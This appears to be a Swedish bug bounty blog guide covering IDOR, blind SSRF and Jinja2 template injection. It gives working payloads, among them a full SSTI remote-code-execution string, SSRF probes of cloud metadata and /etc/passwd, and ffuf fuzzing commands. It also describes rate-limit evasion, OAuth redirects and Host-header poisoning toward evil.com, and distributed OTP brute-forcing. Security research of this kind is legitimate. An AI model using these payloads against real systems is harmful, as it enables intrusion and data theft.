🚀 Bug Hunting i Vildmarken: En Guide till Avancerade Säkerhetshål & Bountyjakt

Table of Contents

🚀 Bug Hunting i Vildmarken: En Guide till Avancerade Säkerhetshål & Bountyjakt

Idag dyker vi ner i en äkta pentest-guldgruva – en samling buggar som skulle få vilken bugbounty-jägare som helst att darra av iver. Tänk dig själv som en modern Indiana Jones, fast istället för reliker jagar du CVSS-poäng och kritiska sårbarheter. Dags att gräva!

🔓 1 · IDOR i Filexport-API:t – Din Nyckel till Andras Dokument
#

Snabbfakta 📌 CWE: 639 | 🎯 CVSS: 8.6 | 🛠️ Verktyg: FFUF

Vad är problemet? IDOR (Insecure Direct Object Reference) är som en universellnyckel till ett hotell – gissar du rätt dörrnummer (doc_id), kan du sno andras PDF:er.

Så här gör du:

Fånga dokument-ID:n från din egen export-URL:

/api/export?doc_id=1001  # Kopiera, redigera, testa!

Brute-force:a smart: Börja med ID:n nära ditt eget (±100) och skala upp:
```
ffuf -w 1-1050.txt -u "https://target.com/api/export?doc_id=FUZZ"
```
Hitta PDF:er där owner_id ≠ din – grattis, du har kringgått RBAC!

Pro-tips: Lägg till X-Original-IP: 127.0.0.1 för att smyga förbi rate limits.

🌐 2 · Blind SSRF i Webhook-endpointen – En Lögnaktig Budbärare
#

Snabbfakta 📌 CWE: 918 | 🎯 CVSS: 8.2 | 🎣 Payloads: 169.254.169.254

Vad händer? Webhooken är som en trojansk budbärare – den kan skicka meddelanden vart som helst, inklusive till interna nätverk eller AWS-metadata.

Exploateringssteg:

ffuf -w cloud-provider-ips.txt -u "https://target.com/webhook/submit?callback_url=http://FUZZ"

Bästa payloads:
- file:///etc/passwd
- http://foo%40bar@internal-ip (credential-injection!)
Bekräfta med Burp Collaborator – ser du DNS-träff? Jackpot!

☠️ 3 · Mall-RCE via Jinja2 SSTI – När Mallar Blir Dödliga
#

Snabbfakta 📌 CWE: 94 | 🎯 CVSS: 9.8 | 💀 Impact: Full RCE

Så funkar det: Jinja2-mallmotorn är som en marionett – kontrollerar du snörena (mallinput), kan du få systemet att dansa efter dina villkor.

Testa sandboxen:

{{7*7}}  → 49? Då är det kört!

Eskalera till RCE:

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('id').read() }}

Automatisera med en Nuclei-mall – sätt på popcornen och se shell:en rulla in.

⚡ 4 · Sex Bonus-Buggar på 60 Sekunder – Snabbjakt för Stressade Hackare
#

Bug	Snabblösning
Clickjacking	`<iframe transparent över "Radera konto"` – saknas `X-Frame-Options`? Bingo!
Pre-Account Takeover	Radera kontot → sessionen lever kvar. `GET /api/profile` = gratis åtkomst.
OAuth Redirect	`redirect_uri[]=valid&redirect_uri[]=evil` – validerar bara första. Lurigt!
Host-Header Poison	`Host: evil.com` i återställningslänk ⇒ länk till din domän.

🧰 Rekommenderad Verktygsstack – Din Bounty-Motor
#

Burp Suite 2023.6+  # Param-Miner + Collaborator = SSRF-magi
FFUF 2.0.0          # Fuzz:a parametrar, headers OCH paths samtidigt
Nuclei 3.0+         # Anpassade mallar för SSTI/SSRF
Hydra + AWS-spots   # Distribuerad OTP-brute med 50 instanser

💰 Triage-Prioritering: Så Får Du Max Payout
#

Mall-RCE → Critical (💰💰💰)
SSRF → AWS Creds → High (💰💰)
IDOR med Mass-Exfil → Medium-High
OAuth Redirect → Snabb fix, bra bounty

✅ Slutchecklista: Så Godkänns Din Rapport
#

📸 Skärmdumpar + Video-PoC – “Jag ser uid=0(root) i terminalen”
🏷 CVSS + MITRE-ID direkt i rapporten – undvik 10 uppföljningsmejl
🧪 Repeterbara kommandon – curl -H "X-Original-IP: 127..."
🚫 Beskriv WAF-kringgång – utvecklarna älskar tekniska detaljer!

🎯 Avslutning: Från Bug till Bounty
#

Bugbounty är en konst – det handlar om att se system med nya ögon. Varje endpoint är en potentiell dörr, varje parameter en nyckel. Nästa gång du ser en Jinja2-mall eller ett doc_id, tänk: Vad händer om jag pushar gränserna?

Ditt uppdrag: Öppna Burp, välj ett mål, och prova en teknik från guiden. Som man säger – den som inte vågar, får ingen RCE. 😉

Lycka till, och kom ihåg: Etisk hacking är som en bra relation – kommunikation, respekt och massvis med curl-kommandon. 🖥️💖

[Skrivet av en bugbounty-jägare som en gång kraschade en SaaS-plattform med en felaktigt URL-kodad emoji. True story.]